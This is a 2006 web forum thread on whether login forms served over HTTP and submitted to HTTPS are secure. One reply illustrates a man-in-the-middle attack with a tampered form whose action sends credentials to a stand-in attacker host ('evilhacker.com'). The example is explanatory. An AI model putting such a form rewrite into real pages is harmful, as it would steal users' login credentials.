homepage Welcome to WebmasterWorld Guest from 54.227.41.242
register, free tools, login, search, pro membership, help, library, announcements, recent posts, open posts,
Become a Pro Member
Home / Forums Index / WebmasterWorld / Webmaster General
Forum Library, Charter, Moderators: phranque

Webmaster General Forum

    
log in then https?
Clinton Labombard




msg:390336
 2:22 am on Mar 27, 2006 (gmt 0)

I've noticed some sites will allow you to enter your login information with an http page then after you've hit the submit button it switches to an https page. Is that secure?

(by the way, shouldn't there be a security related section here? )

 

Raymond




msg:390337
 4:30 am on Mar 27, 2006 (gmt 0)

Nothing is encrypted in http, so if you enter your password in http, it can be seen as plain text.

MichaelBluejay




msg:390338
 2:18 pm on Mar 27, 2006 (gmt 0)

There's more to this issue than you think. The bottom line is, your info is not secure, but not for the Raymond thinks. The HTML behind the login form will be something like <form action=http://www.domain.com/login.cgi">. If the action is htts://, the form is submitted securely. If the action is http:// (without the "s"), it's not.

But there's another problem: If the <form> resides on a page that is itself insecure (http:// instead of https://), then a hacker listening in could have intercepted the page and hacked it before sending it to the user, replacing the form with something like <form action="http://www.evilhacker.com">. The problem is not the missing "s", the problem is that when you hit Submit, you'll be sending your info straight to a hacker.

Amazingly, most banks' login forms are on insecure pages. What's worse, if you click the little Security Info icon under the login form, you get a page with some B.S. about how the form is supposedly secure because the action url is https://. But in reality, the login is compromised if it's on a insecure page because it could have been hacked before the user ever sees it. The banks' method of security is like having a house with two doors and locking one of them (and then falsely telling everyone that the house is completely secure.)

Netcraft and Microsoft have been telling banks not to do this, but they're not listening.

More at Netcraft: [news.netcraft.com...]

Clinton Labombard




msg:390339
 4:27 pm on Mar 27, 2006 (gmt 0)

I see. Thank you very much. I know of a few credit card companies that use the 'double-door' method.

ronburk




msg:390340
 9:43 pm on Mar 27, 2006 (gmt 0)

Nothing is encrypted in http, so if you enter your password in http, it can be seen as plain text.

Perhaps too broad an inference to draw from just the word "http". JavaScript or other client-side code is free to encrypt and transmit over HTTP. Digest authentication is reasonably widely supported at this point.

But there's another problem: If the <form> resides on a page that is itself insecure (http:// instead of https://), then a hacker listening in could have intercepted the page and hacked it before sending it to the user, replacing the form with something like <form action="http://www.evilhacker.com">. The problem is not the missing "s", the problem is that when you hit Submit, you'll be sending your info straight to a hacker.

Presumes the bad guy has control of the network either in the middle or on the server side. I would certainly not be wanting to trust my login information to even HTTPS at that point.

Global Options:
 top home search open messages active posts  
 

Home / Forums Index / WebmasterWorld / Webmaster General
rss feed

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
Home ¦ Free Tools ¦ Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About ¦ Library ¦ Newsletter
WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved